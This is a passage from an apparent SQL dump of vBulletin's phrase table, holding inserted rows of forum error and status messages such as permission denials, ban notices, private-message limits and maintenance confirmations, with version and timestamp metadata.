It is recommended that you update counters now.', 'vbulletin', '', 0, ''), (34517, -1, 'moved_threads_successfully_modcp', 'error', 'Moved Threads Successfully', 'vbulletin', '', 0, ''), (34518, -1, 'moved_users_successfully', 'error', 'Moved Users Successfully', 'vbulletin', '', 0, ''), (34519, -1, 'moveillegalforum', 'error', 'You have tried to move the thread into a forum that cannot contain posts. Please select a different forum.', 'vbulletin', '', 0, ''), (34520, -1, 'movesameforum', 'error', 'You cannot move a thread to the same forum it is currently in. Someone else may have just moved this thread to your destination forum resulting in this error message.', 'vbulletin', '', 0, ''), (34521, -1, 'multiple_pictures_uploaded_errors_file_x', 'error', 'Some of the pictures you attempted to upload failed. The pictures that failed are:\r\n

    {1}
\r\nTo receive a more detailed error message, upload only one picture at a time.', 'vbulletin', 'vBulletin Solutions', 1192120858, '3.7.0 Beta 1'), (34522, -1, 'must_be_group_member', 'error', 'You must be a group member to perform this action.', 'vbulletin', 'vBulletin Solutions', 1195320186, '3.7.0 Beta 1'), (34523, -1, 'must_be_group_member_view_add_pictures', 'error', 'You must be a member of this group to view or add pictures. ', 'vbulletin', 'vBulletin Solutions', 1195562442, '3.7.0 Beta 1'), (34524, -1, 'must_be_group_member_view_add_pictures_join_x', 'error', 'You must be a member of this group to view or add pictures. Would you like to join? Click here!', 'vbulletin', 'vBulletin Solutions', 1195562418, '3.7.0 Beta 1'), (34525, -1, 'must_be_two_different_users', 'error', 'There must be two different users specified.', 'vbulletin', 'vBulletin Solutions', 1201045799, '3.7.0 Beta 5'), (34526, -1, 'must_enter_group_name', 'error', 'You must enter a group name.', 'vbulletin', 'vBulletin Solutions', 1198068307, '3.7.0 Beta 3'), (34527, -1, 'must_have_positive_maxlength', 'error', 'You must enter a positive value (greater than 0) for the \"Maximum Length\" setting.', 'vbulletin', 'vBulletin Solutions', 1205767973, '3.7.0 Release Candidate 1'), (34528, -1, 'must_save_calendar', 'error', 'You must save this calendar before you can add custom fields to it', 'vbulletin', '', 0, ''), (34529, -1, 'must_select_a_category', 'error', 'You must select a category for your social group.', 'vbulletin', 'vBulletin Solutions', 1215700349, '3.8.0 Alpha 1'), (34530, -1, 'must_select_valid_group_add_pictures', 'error', 'You must select a valid group into which these pictures should be added.', 'vbulletin', 'vBulletin Solutions', 1195493057, '3.7.0 Beta 1'), (34531, -1, 'must_select_valid_pictures_add_group', 'error', 'You must select valid pictures to add to the group.', 'vbulletin', 'vBulletin Solutions', 1196425984, '3.7.0 Beta 1'), (34532, -1, 'must_specify_field_option', 'error', 'You must specify at least one option for this field, or allow the user to enter their own', 'vbulletin', '', 0, ''), (34533, -1, 'name_exists', 'error', 'There is already a(n) {1} named \'{2}\'. You may not create duplicate names.', 'vbulletin', 'vBulletin Solutions', 1150742658, '3.6.0 Beta 3'), (34534, -1, 'name_too_long_max_x', 'error', 'The name you have entered is too long. Please shorten it to {1} characters or fewer.', 'vbulletin', 'vBulletin Solutions', 1203612412, '3.7.0 Beta 6'), (34535, -1, 'need_to_rebuild_avatars', 'error', 'Avatar thumbnails will now need to be rebuilt. Please go to Maintenance -> Update Counters -> Rebuild Avatar Thumbnails and click \"Rebuild Avatar Thumbnails\".', 'vbulletin', 'vBulletin Solutions', 1194289214, '3.7.0 Beta 1'), (34536, -1, 'no_access_to_admin_control', 'error', 'Sorry, you don\'t have permission to access the administrative controls on this page.\r\n

\r\nIf you need to access this page, ask your lead administrator to enable your permissions for this page using the Administrator Permissions section of the control panel.', 'vbulletin', '', 0, ''), (34537, -1, 'no_applicable_posts_selected', 'error', 'You did not select any posts to which the action you picked can be applied.', 'vbulletin', '', 0, ''), (34538, -1, 'no_avatar_categories_found', 'error', 'No avatar categories were found
Add one now', 'vbulletin', '', 0, ''), (34539, -1, 'no_avatars_selected', 'error', 'You did not select any avatars to be inserted. Use the check-boxes at the side of the page to specify which images to insert.', 'vbulletin', '', 0, ''), (34540, -1, 'no_calendars_matched_your_query', 'error', 'No Calendars Matched Your Query', 'vbulletin', '', 0, ''), (34541, -1, 'no_changes_made', 'error', 'No changes were made.', 'vbulletin', 'vBulletin Solutions', 1216736026, '3.8.0 Alpha 1'), (34542, -1, 'no_checkbox_item_not_deleted', 'error', 'You did not confirm that you wanted to delete this item.', 'vbulletin', 'vBulletin Solutions', 1192542904, '3.7.0 Beta 1'), (34543, -1, 'no_content_tagged_with_x', 'error', 'No content has been tagged with \'{1}\'.', 'vbulletin', 'vBulletin Solutions', 1240397670, '3.8.3'), (34544, -1, 'no_feeds_defined', 'error', 'No feeds are currently defined.
\r\n
\r\nClick here to add one.', 'vbulletin', 'vBulletin Solutions', 1149265173, '3.6.0 Beta 1'), (34545, -1, 'no_file_paths_changed', 'error', 'No file paths changed. There is nothing to do!', 'vbulletin', 'vBulletin Solutions', 1192543587, '3.7.0 Beta 1'), (34546, -1, 'no_file_uploaded_and_no_local_file_found', 'error', 'No file uploaded and no local file found.', 'vbulletin', '', 0, ''), (34547, -1, 'no_global_announcements_defined', 'error', 'There are no Global Announcements defined', 'vbulletin', '', 0, ''), (34548, -1, 'no_groups_defined_as_banned', 'error', 'The administrator has not specified any groups that contain banned users.

Please do so using the usergroup editor.', 'vbulletin', '', 0, ''), (34549, -1, 'no_help_topics', 'error', 'There are currently no help topics associated with this page/action', 'vbulletin', '', 0, ''), (34550, -1, 'no_images_selected', 'error', 'You did not select any images to be inserted as {1}. Use the check-boxes at the side of the page to specify which images to insert.', 'vbulletin', '', 0, ''), (34551, -1, 'no_join_requests_matched_your_query', 'error', 'No Join Requests Matched Your Query', 'vbulletin', '', 0, ''), (34552, -1, 'no_log_entries_matched_your_query', 'error', 'No Log Entries Matched Your Query', 'vbulletin', '', 0, ''), (34553, -1, 'no_log_file_defined_in_vbulletin_options', 'error', 'No log file defined in vBulletin Options', 'vbulletin', '', 0, ''), (34554, -1, 'no_logs_matched_your_query', 'error', 'No Logs Matched Your Query', 'vbulletin', '', 0, ''), (34555, -1, 'no_matches_found', 'error', 'No Matches Found', 'vbulletin', '', 0, ''), (34556, -1, 'no_moderator_matched_your_query', 'error', 'No Moderator Matched Your Query', 'vbulletin', '', 0, ''), (34557, -1, 'no_new_avatars', 'error', 'No avatars were found that have not already been added', 'vbulletin', '', 0, ''), (34558, -1, 'no_new_post_icons', 'error', 'No post icons were found that have not already been added', 'vbulletin', '', 0, ''), (34559, -1, 'no_new_smilies', 'error', 'No smilies were found that have not already been added', 'vbulletin', '', 0, ''), (34560, -1, 'no_notice_criteria_active', 'error', 'In order to be valid, a notice must have at least one active criterion (or it would never be shown).
\r\n
\r\nPlease go back and set up display criteria.', 'vbulletin', 'vBulletin Solutions', 1189782638, '3.6.8'), (34561, -1, 'no_permission', 'error', 'Sorry, you are not authorized to view this page', 'vbulletin', '', 0, ''), (34562, -1, 'no_permission_announcement', 'error', 'You are not authorized to add or edit announcements in this forum', 'vbulletin', '', 0, ''), (34563, -1, 'no_permission_avatars', 'error', 'You are not authorized to edit avatars', 'vbulletin', '', 0, ''), (34564, -1, 'no_permission_ban_non_registered_users', 'error', 'You are not authorized to ban users who are not considered normal, registered users', 'vbulletin', '', 0, ''), (34565, -1, 'no_permission_ban_users', 'error', 'You are not authorized to ban users', 'vbulletin', '', 0, ''), (34566, -1, 'no_permission_duplicate_reputation', 'error', 'You cannot have multiple reputation levels with the same minimum reputation requirement', 'vbulletin', 'vBulletin Solutions', 1245773640, '3.8.3'), (34567, -1, 'no_permission_edit_selector_x_property_y', 'error', 'You do not have permission to edit {1} -> {2}.', 'vbulletin', 'vBulletin Solutions', 1193401523, '3.7.0 Beta 1'), (34568, -1, 'no_permission_forum_password', 'error', 'You are not authorized to set a password for this forum', 'vbulletin', '', 0, ''), (34569, -1, 'no_permission_global_announcement', 'error', 'Only Super Moderators and Administrators may add or edit Global Announcements', 'vbulletin', '', 0, ''), (34570, -1, 'no_permission_ips', 'error', 'You are not authorized to view IP addresses', 'vbulletin', '', 0, ''), (34571, -1, 'no_permission_queries', 'error', 'You are not authorized to execute SQL queries', 'vbulletin', '', 0, ''), (34572, -1, 'no_permission_search_users', 'error', 'You are not authorized to search for users', 'vbulletin', '', 0, ''), (34573, -1, 'no_permission_signatures', 'error', 'You are not authorized to edit signatures', 'vbulletin', '', 0, ''), (34574, -1, 'no_permission_un_ban_users', 'error', 'You are not authorized to un-ban users', 'vbulletin', '', 0, ''), (34575, -1, 'no_permissions_set', 'error', 'There are no permissions set for the selected forum. No duplication will take place', 'vbulletin', '', 0, ''), (34576, -1, 'no_phrases_defined', 'error', 'There are no phrases defined', 'vbulletin', '', 0, ''), (34577, -1, 'no_phrases_matched_your_query', 'error', 'No Phrases Matched Your Query', 'vbulletin', '', 0, ''), (34578, -1, 'no_picture_comments_awaiting_approval', 'error', 'You have no picture comments awaiting approval. Return to your album list.', 'vbulletin', 'vBulletin Solutions', 1200322826, '3.7.0 Beta 4'), (34579, -1, 'no_pm_to_download', 'error', 'You have no private messages to download.', 'vbulletin', '', 0, ''), (34580, -1, 'no_polls_found', 'error', 'No polls found.', 'vbulletin', 'vBulletin Solutions', 1197975794, '3.7.0 Beta 3'), (34581, -1, 'no_post_edit_histories_matched_your_query', 'error', 'No Post Edit Histories Matched Your Query', 'vbulletin', '', 0, ''), (34582, -1, 'no_post_icon_categories_found', 'error', 'No post icon categories were found
Add one now', 'vbulletin', '', 0, ''), (34583, -1, 'no_post_icons_selected', 'error', 'You did not select any post icons to be inserted. Use the check-boxes at the side of the page to specify which images to insert.', 'vbulletin', '', 0, ''), (34584, -1, 'no_private_messages_matched_your_query', 'error', 'No Private Messages Matched Your Query', 'vbulletin', '', 0, ''), (34585, -1, 'no_private_messages_selected', 'error', 'No private messages selected.', 'vbulletin', '', 0, ''), (34586, -1, 'no_profile_fields_defined', 'error', 'You don\'t have any Custom Profile fields defined.
\r\n
\r\nYou can add profile fields here.', 'vbulletin', '', 0, ''), (34587, -1, 'no_public_usergroups', 'error', 'There are currently no public usergroups available for you to join.', 'vbulletin', '', 0, ''), (34588, -1, 'no_reason_specified', 'error', 'No reason was specified.', 'vbulletin', 'vBulletin Solutions', 1157986852, '3.6.1'), (34589, -1, 'no_recently_updated_albums', 'error', 'No albums have been updated recently.', 'vbulletin', 'vBulletin Solutions', 1233745282, '3.8.2'), (34590, -1, 'no_referrals_matched_your_query', 'error', 'No Referrals Matched Your Query', 'vbulletin', '', 0, ''), (34591, -1, 'no_reminders_scheduled', 'error', 'This date has no reminders scheduled', 'vbulletin', '', 0, ''), (34592, -1, 'no_results_matched_your_query', 'error', 'No Results Matched Your Query', 'vbulletin', '', 0, ''), (34593, -1, 'no_select_pictures_upload', 'error', 'You did not select any pictures to upload.', 'vbulletin', 'vBulletin Solutions', 1192543144, '3.7.0 Beta 1'), (34594, -1, 'no_sig_pic_to_use', 'error', 'There is no current signature picture to use.', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'), (34595, -1, 'no_smilie_categories_found', 'error', 'No smilie categories were found
Add one now', 'vbulletin', '', 0, ''), (34596, -1, 'no_smilies_selected', 'error', 'You did not select any smilies to be inserted. Use the check-boxes at the side of the page to specify which images to insert.', 'vbulletin', '', 0, ''), (34597, -1, 'no_tags_selected', 'error', 'No tags selected.', 'vbulletin', 'vBulletin Solutions', 1216727308, '3.8.0 Alpha 1'), (34598, -1, 'no_threads_matched_your_query', 'error', 'No Threads Matched Your Query', 'vbulletin', '', 0, ''), (34599, -1, 'no_unread_picture_comments', 'error', 'You have no unread picture comments. Return to your album list.', 'vbulletin', 'vBulletin Solutions', 1200322803, '3.7.0 Beta 4'), (34600, -1, 'no_user_ranks_defined', 'error', 'There are no User Ranks defined', 'vbulletin', '', 0, ''), (34601, -1, 'no_userchange_history', 'error', 'This user does not have any change history.', 'vbulletin', 'vBulletin Solutions', 1190723918, '3.7.0 Beta 1'), (34602, -1, 'no_users_banned_from_x_board', 'error', 'No users are banned from {1}.', 'vbulletin', '', 0, ''), (34603, -1, 'no_users_banned_from_x_board_click_here', 'error', 'No users are banned from {1}.
\r\n
\r\nTo ban a user, click here', 'vbulletin', '', 0, ''), (34604, -1, 'no_users_matched_your_query', 'error', 'No Users Matched Your Query', 'vbulletin', '', 0, ''), (34605, -1, 'no_users_matched_your_query_x', 'error', 'No Users Matched Your Query, Username {1} does not exist', 'vbulletin', 'vBulletin Solutions', 1190990885, '3.7.0 Beta 1'), (34606, -1, 'no_visitor_messages_matched_your_query', 'error', 'No Visitor Messages Matched Your Query', 'vbulletin', 'vBulletin Solutions', 1222174849, '3.8.0 Alpha 2'), (34607, -1, 'no_xml_and_no_path', 'error', 'Sorry, no XML was passed into this function and the $path variable empty', 'vbulletin', '', 0, ''), (34608, -1, 'noattachments', 'error', 'There are no attachments to display', 'vbulletin', '', 0, ''), (34609, -1, 'nocalendars', 'error', 'The Calendar is currently disabled.', 'vbulletin', '', 0, ''), (34610, -1, 'noevents', 'error', 'There are no events to display.', 'vbulletin', '', 0, ''), (34611, -1, 'noid', 'error', 'No {1} specified. If you followed a valid link, please notify the administrator', 'vbulletin', '', 0, ''), (34612, -1, 'nomemberlist', 'error', 'Sorry! The administrator has disabled the list of members.', 'vbulletin', '', 0, ''), (34613, -1, 'nomemberlistsearch', 'error', 'Sorry! The administrator has disabled searching of the member list.', 'vbulletin', '', 0, ''), (34614, -1, 'nomessage', 'error', 'You didn\'t enter a message. Please press your back button and enter one.', 'vbulletin', '', 0, ''), (34615, -1, 'nomessagetouser', 'error', 'Please enter a message to send to the user.', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'), (34616, -1, 'nonextnewest', 'error', 'There are no threads newer than the previous one. Click the back button in your browser to return to it.', 'vbulletin', '', 0, ''), (34617, -1, 'nonextoldest', 'error', 'There are no threads older than the previous one. Click the back button in your browser to return to it.', 'vbulletin', '', 0, ''), (34618, -1, 'nopermission_banned', 'error', '

You have been banned for the following reason:
\r\n{1}

\r\n\r\n

Date the ban will be lifted: {2}

', 'vbulletin', '', 0, ''), (34619, -1, 'nopermission_banned_infractions', 'error', '

You have been banned due to infractions.

Date the ban will be lifted: {1}

', 'vbulletin', 'vBulletin Solutions', 1155853909, '3.6.1'), (34620, -1, 'nopermission_loggedin', 'error', '

{1}, you do not have permission to access this page. This could be due to one of several reasons:

\r\n\r\n
    \r\n
  1. Your user account may not have sufficient privileges to access this page. Are you trying to edit someone else\'s post, access administrative features or some other privileged system?
  2. \r\n
  3. If you are trying to post, the administrator may have disabled your account, or it may be awaiting activation.
  4. \r\n
\r\n\r\n
\r\n Log Out\r\n Home\r\n
', 'vbulletin', '', 0, ''), (34621, -1, 'nopermission_loggedin_ajax', 'error', '{1}, you do not have permission to access this page. This could be due to one of several reasons:\r\n- Your user account may not have sufficient privileges to access this page. Are you trying to edit someone else\'s post, access administrative features or some other privileged system?\r\n- If you are trying to post, the administrator may have disabled your account, or it may be awaiting activation.', 'vbulletin', 'vBulletin Solutions', 1198883178, '3.7.0 Beta 4'), (34622, -1, 'nopermission_loggedout', 'error', 'You do not have permission to perform this action. Please refresh the page and login before trying again.', 'vbulletin', 'vBulletin Solutions', 1149852934, '3.6.0 Beta 2'), (34623, -1, 'nopolloptionselected', 'error', 'You did not select an option to vote for. Please press back to return to the poll and choose an option before voting.', 'vbulletin', '', 0, ''), (34624, -1, 'noquestionoption', 'error', 'Please complete both the question field and at least 2 option fields. Press the back button, correct the problem and try again.', 'vbulletin', '', 0, ''), (34625, -1, 'noreason', 'error', 'Please enter a reason for reporting this post.', 'vbulletin', '', 0, ''), (34626, -1, 'noregister', 'error', 'Sorry, registration has been disabled by the administrator.', 'vbulletin', '', 0, ''), (34627, -1, 'nosignaturepermission', 'error', 'Sorry, you are not permitted to have a signature.', 'vbulletin', '', 0, ''), (34628, -1, 'nosplitposts', 'error', 'You must specify some posts to split off from this thread.', 'vbulletin', '', 0, ''), (34629, -1, 'nosubject', 'error', 'Please complete both the subject and message fields.', 'vbulletin', '', 0, ''), (34630, -1, 'nosubscriptions', 'error', '{1} does not have any paid subscriptions available to which you can subscribe.', 'vbulletin', '', 0, ''), (34631, -1, 'nosubtype', 'error', 'An invalid threadid or forumid was specified.', 'vbulletin', '', 0, ''), (34632, -1, 'not_member_groups_find_some', 'error', 'You are not a member of any groups where you can perform this action. Find some to join!', 'vbulletin', 'vBulletin Solutions', 1209132490, '3.7.0'), (34633, -1, 'not_much_would_be_accomplished_by_merging', 'error', 'vBulletin Tip #42: Not much would be accomplished by merging this item with itself.', 'vbulletin', '', 0, ''), (34634, -1, 'not_subscribed_to_any_forums', 'error', 'You are not subscribed to any forums', 'vbulletin', '', 0, ''), (34635, -1, 'nothing_to_do', 'error', 'Nothing to Do', 'vbulletin', '', 0, ''), (34636, -1, 'notitle', 'error', 'Please complete the title field for this thread.', 'vbulletin', '', 0, ''), (34637, -1, 'notmemberofdisplaygroup', 'error', 'You cannot set a group to which you do not belong as your displayed group', 'vbulletin', '', 0, ''), (34638, -1, 'notonlist', 'error', '{1} is not on your list.', 'vbulletin', '', 0, ''), (34639, -1, 'nousername', 'error', 'You did not specify a username for your post.', 'vbulletin', '', 0, ''), (34640, -1, 'nousernoteself', 'error', 'You are not allowed to view or modify any user notes that pertain to yourself.', 'vbulletin', '', 0, ''), (34641, -1, 'number_tags_add_exceeded_x', 'error', 'The number of tags you tried to add to this thread exceeded the maximum number of tags by {1}.', 'vbulletin', 'vBulletin Solutions', 1196431410, '3.7.0 Beta 1'), (34642, -1, 'passwordexpired', 'error', 'Your password is {1} days old, and has therefore expired.
\r\n
\r\nPlease change your password using this page.', 'vbulletin', '', 0, ''), (34643, -1, 'passwordhistory', 'error', 'Sorry, you may not use a password that you have used in the past {1} days.
\r\n
\r\nPlease go back and try again.', 'vbulletin', '', 0, ''), (34644, -1, 'passwordmismatch', 'error', 'The two passwords that you entered do not match.', 'vbulletin', '', 0, ''), (34645, -1, 'pending_approval_for_group', 'error', 'You are already Pending approval for this group.', 'vbulletin', 'vBulletin Solutions', 1196174046, '3.7.0 Beta 1'), (34646, -1, 'php_error_exec_disabled', 'error', 'PHP Error: The function exec() has been disabled.', 'vbulletin', 'vBulletin Solutions', 1212055432, '3.7.2'), (34647, -1, 'php_error_unspecified_exec', 'error', 'PHP Error: Unspecified error in exec().', 'vbulletin', 'vBulletin Solutions', 1212055457, '3.7.2'), (34648, -1, 'php_error_x', 'error', 'PHP Error: {1}.', 'vbulletin', 'vBulletin Solutions', 1212055471, '3.7.2'), (34649, -1, 'picture_thumb_url_updated', 'error', 'Album picture thumbnail URL update successfully', 'vbulletin', 'vBulletin Solutions', 1192543619, '3.7.0 Beta 1'), (34650, -1, 'pictures_moved_to_the_database', 'error', 'Pictures moved to the database successfully', 'vbulletin', 'vBulletin Solutions', 1192543632, '3.7.0 Beta 1'), (34651, -1, 'pictures_moved_to_the_file_system', 'error', 'Pictures moved to the file system successfully', 'vbulletin', 'vBulletin Solutions', 1192543710, '3.7.0 Beta 1'), (34652, -1, 'pictures_moved_within_file_system_update_x_y', 'error', 'Your vBulletin settings have been updated to read your album pictures or thumbnails from a new location. The following path or paths were changed:\r\n
    {1}
\r\nYou must now manually move your pictures to the new folders using an FTP client or shell commands, such as:\r\n
    {2}
', 'vbulletin', 'vBulletin Solutions', 1192543906, '3.7.0 Beta 1'), (34653, -1, 'pictures_moved_within_the_file_system', 'error', 'Pictures moved within the file system successfully', 'vbulletin', 'vBulletin Solutions', 1192543660, '3.7.0 Beta 1'), (34654, -1, 'pictures_not_moved_to_the_database', 'error', 'Pictures not moved to the database', 'vbulletin', 'vBulletin Solutions', 1192543671, '3.7.0 Beta 1'), (34655, -1, 'pictures_not_moved_to_the_file_system', 'error', 'Pictures not moved to the file system', 'vbulletin', 'vBulletin Solutions', 1192543724, '3.7.0 Beta 1'), (34656, -1, 'pictures_not_moved_within_the_file_system', 'error', 'Pictures not moved within the file system', 'vbulletin', 'vBulletin Solutions', 1192543682, '3.7.0 Beta 1'), (34657, -1, 'please_complete_required_fields', 'error', 'Please Complete All Required Fields', 'vbulletin', '', 0, ''), (34658, -1, 'please_confirm_delete', 'error', 'Please confirm your desire to delete this item by checking the \"Delete\" box.', 'vbulletin', '', 0, ''), (34659, -1, 'please_ensure_x_file_is_located_at_y', 'error', 'Please ensure that the {1} file is located at {2} and then reload this page', 'vbulletin', '', 0, ''), (34660, -1, 'pm_adminoff', 'error', 'Your administrator has disabled private messaging.', 'vbulletin', '', 0, ''), (34661, -1, 'pm_nofolders', 'error', 'You must first create a custom folder if you wish to be able to move messages from your inbox. You may start by clicking Here.', 'vbulletin', '', 0, ''), (34662, -1, 'pm_non_contacts_cant_reply', 'error', 'Your options are configured to accept private messages only from your contacts. Therefore the following users will be unable to reply:
    {1}
To send the message anyway, , otherwise remove these users\' names from the recipients list.', 'vbulletin', 'vBulletin Solutions', 1209205296, '3.7.0'), (34663, -1, 'pm_throttle_reached', 'error', 'You may only post {1} messages every {2} minutes.', 'vbulletin', 'vBulletin Solutions', 1216399091, '3.8.0 Alpha 1'), (34664, -1, 'pm_turnedoff', 'error', 'You have turned off private messages. You may not send private messages until you turn them on by editing your options.', 'vbulletin', 'vBulletin Solutions', 1166087850, '3.6.5'), (34665, -1, 'pmfloodcheck', 'error', 'This forum requires that you wait {1} seconds between sending private messages. Please try again in {2} seconds.', 'vbulletin', '', 0, ''), (34666, -1, 'pminvalidrecipient', 'error', 'Invalid recipient username. Please press the back button, enter the correct username and try again. Click Here to See the Members List', 'vbulletin', '', 0, ''), (34667, -1, 'pmquotaexceeded', 'error', '{1} has exceeded their stored private messages quota and cannot accept further messages until they clear some space.', 'vbulletin', '', 0, ''), (34668, -1, 'pmrecipientsnotfound', 'error', 'The following users were not found:
  1. {1}
', 'vbulletin', '', 0, ''), (34669, -1, 'pmrecipturnedoff', 'error', '{1} has chosen not to receive private messages or may not be allowed to receive private messages. Therefore you may not send your message to him/her.
\r\n
\r\nIf you are trying to send this message to multiple recipients, remove {1} from the recipient list and send the message again.', 'vbulletin', 'vBulletin Solutions', 1200500926, '3.7.0 Beta 4'), (34670, -1, 'pmtoomanyrecipients', 'error', 'Too many recipients - you are attempting to send to {1} users but you are only allowed to send to {2} users.', 'vbulletin', '', 0, ''), (34671, -1, 'pmusernotallowed', 'error', '{1} is not allowed to use private messaging', 'vbulletin', '', 0, ''), (34672, -1, 'pollalready', 'error', 'You cannot add a poll to this thread because it already has a poll attached to it.', 'vbulletin', '', 0, ''), (34673, -1, 'pollclosed', 'error', 'The poll you selected is closed. Please press back to return to the poll.', 'vbulletin', '', 0, ''), (34674, -1, 'polloptionlength', 'error', 'Poll options cannot exceed {1} characters. Option(s) {2} exceed this limitation.', 'vbulletin', '', 0, ''), (34675, -1, 'polltimeout', 'error', 'You can only add a poll to a thread within {1} minutes of posting the thread.', 'vbulletin', '', 0, ''), (34676, -1, 'postalreadywarned', 'error', 'This post has already received an infraction.', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'), (34677, -1, 'postfloodcheck', 'error', 'This forum requires that you wait {1} seconds between posts. Please try again in {2} seconds.', 'vbulletin', '', 0, ''), (34678, -1, 'prefix_deleted', 'error', 'Prefix Deleted Successfully', 'vbulletin', 'vBulletin Solutions', 1190029584, '3.7.0 Beta 1'), (34679, -1, 'prefix_saved', 'error', 'Prefix Saved', 'vbulletin', 'vBulletin Solutions', 1190029600, '3.7.0 Beta 1'), (34680, -1, 'prefix_set_deleted', 'error', 'Prefix Set Deleted Successfully', 'vbulletin', 'vBulletin Solutions', 1190029615, '3.7.0 Beta 1'), (34681, -1, 'prefix_set_saved', 'error', 'Prefix Set Saved', 'vbulletin', 'vBulletin Solutions', 1190029632, '3.7.0 Beta 1'), (34682, -1, 'primary_equals_secondary', 'error', 'The primary usergroup set by this subscription is also listed as a secondary usergroup for this subscription. Please change the primary group or remove the secondary group.', 'vbulletin', 'vBulletin Solutions', 1143045338, '3.6.0 Beta 1'), (34683, -1, 'problem_with_x_phrase', 'error', 'There is a problem with the {1} email phrase.', 'vbulletin', 'vBulletin Solutions', 1156879357, '3.6.1'), (34684, -1, 'product_disabled_successfully', 'error', 'Product Disabled Successfully', 'vbulletin', '', 0, ''), (34685, -1, 'product_enabled_successfully', 'error', 'Product Enabled Successfully', 'vbulletin', '', 0, ''), (34686, -1, 'product_id_invalid', 'error', 'The product ID you have specified is invalid.
\r\n
\r\nProduct IDs must be no more than 25 characters long and must consist of only lowercase characters a-z, numbers 0-9 and underscores.
\r\n
\r\nTherefore, we suggest that you alter your specified product ID from this:\r\n\r\n
{1}
\r\n\r\nto this:\r\n
{2}
', 'vbulletin', '', 0, ''), (34687, -1, 'product_not_installed_disabled', 'error', 'The required product has not been installed or is currently disabled.', 'vbulletin', 'vBulletin Solutions', 1178022846, '3.6.6'), (34688, -1, 'product_requires_plugin_system', 'error', 'To use this product the plugin system must be enabled.', 'vbulletin', 'vBulletin Solutions', 1178289007, '3.6.6'), (34689, -1, 'product_x_imported', 'error', 'Product {1} Imported', 'vbulletin', '', 0, ''), (34690, -1, 'product_x_installed_no_overwrite', 'error', 'Product \'{1}\' is already installed and you did not specify that this product may be overwritten/upgraded.', 'vbulletin', '', 0, ''), (34691, -1, 'product_x_installed_version_y_z', 'error', 'Product {1} is already installed. (Existing version: {2}; this version: {3})', 'vbulletin', '', 0, ''), (34692, -1, 'product_x_uninstalled', 'error', 'Product {1} Uninstalled', 'vbulletin', '', 0, ''), (34693, -1, 'product_x_updated', 'error', 'Product {1} Updated', 'vbulletin', '', 0, ''), (34694, -1, 'profile_field_uneditable', 'error', 'This profile field is no longer editable.', 'vbulletin', 'vBulletin Solutions', 1193765845, '3.7.0 Beta 1'), (34695, -1, 'promotion_join_same_group', 'error', 'You specified the group to join itself which is not allowed', 'vbulletin', '', 0, ''), (34696, -1, 'pruned_control_panel_log_successfully', 'error', 'Pruned Control Panel Log Successfully', 'vbulletin', '', 0, ''), (34697, -1, 'pruned_moderator_log_successfully', 'error', 'Pruned Moderator Log Successfully', 'vbulletin', '', 0, ''), (34698, -1, 'pruned_post_edit_history_successfully', 'error', 'Pruned Post Edit History Successfully', 'vbulletin', '', 0, ''), (34699, -1, 'pruned_scheduled_task_log_successfully', 'error', 'Pruned Scheduled Task Log Successfully', 'vbulletin', '', 0, ''), (34700, -1, 'pruned_threads_successfully', 'error', 'Pruned Threads Successfully.

It is recommended that you update counters now.', 'vbulletin', '', 0, ''), (34701, -1, 'pruned_threads_successfully_modcp', 'error', 'Pruned Threads Successfully', 'vbulletin', '', 0, ''), (34702, -1, 'rebuilt_attachment_thumbnails_successfully', 'error', 'Rebuilt Attachment Thumbnails Successfully', 'vbulletin', '', 0, ''), (34703, -1, 'rebuilt_avatar_thumbnails_successfully', 'error', 'Rebuilt Avatar Thumbnails Successfully', 'vbulletin', 'vBulletin Solutions', 1193961331, '3.7.0 Beta 1'), (34704, -1, 'rebuilt_bitfields_successfully', 'error', 'Rebuilt Bitfields Successfully', 'vbulletin', '', 0, ''), (34705, -1, 'rebuilt_picture_thumbnails_successfully', 'error', 'Rebuilt Picture Thumbnails Successfully', 'vbulletin', 'vBulletin Solutions', 1198889919, '3.7.0 Beta 4'), (34706, -1, 'rebuilt_search_index_successfully', 'error', 'Rebuilt Search Index Successfully', 'vbulletin', '', 0, ''), (34707, -1, 'rebuilt_sgicon_thumbnails_successfully', 'error', 'Rebuilt Social Group Icon Thumbnails Successfully', 'vbulletin', 'vBulletin Solutions', 1231771040, '3.8.1'), (34708, -1, 'rebuilt_statistics_successfully', 'error', 'Rebuilt Statistics Successfully', 'vbulletin', '', 0, ''), (34709, -1, 'rebuilt_thumbnails_successfully', 'error', 'Rebuilt thumbnails successfully', 'vbulletin', 'vBulletin Solutions', 1192543745, '3.7.0 Beta 1'), (34710, -1, 'rebuilt_user_reputation_successfully', 'error', 'Rebuilt User Reputation Successfully', 'vbulletin', '', 0, ''), (34711, -1, 'recent_album_updates_disabled', 'error', 'Recently Updated Albums are not currently enabled.', 'vbulletin', 'vBulletin Solutions', 1217334911, '3.8.0 Alpha 1'), (34712, -1, 'recent_album_updates_rebuilt', 'error', 'Recently Updated Albums successfully rebuilt.', 'vbulletin', 'vBulletin Solutions', 1217334953, '3.8.0 Alpha 1'), (34713, -1, 'redirecting_please_wait', 'error', 'Please Wait While You Are Redirected...', 'vbulletin', '', 0, ''), (34714, -1, 'regexincorrect', 'error', 'You did not enter the correct format for the {1} field. Please read the field description for the expected format.', 'vbulletin', '', 0, ''), (34715, -1, 'register_not_agreed', 'error', 'You have chosen not to accept the forum rules, so registration cannot continue.
\r\n
\r\nClick here to return to the main forums page, or click the \'Back\' button on your browser if you now want to agree with the forum rules.', 'vbulletin', '', 0, ''), (34716, -1, 'registeremail', 'error', 'Thank you for registering, {1}. An email has been dispatched to {2} with details on how to activate your account. Click here to return to where you were previously.\r\n
\r\n
\r\nYou will receive an email in your inbox. You MUST follow the link in that email before you can post on these forums. Until you do that, you will be told that you do not have permission to post.', 'vbulletin', '', 0, ''), (34717, -1, 'registration_complete', 'error', 'Thank you, {1}. Your registration is now complete.
\r\n
\r\nYou may now proceed to edit your Profile in order to fill in additional personal details about yourself, or you could modify your Options to customize your browsing experience of this site. If you would rather do these things later, you can do so by following the links around the site to your User Control Panel.
\r\n
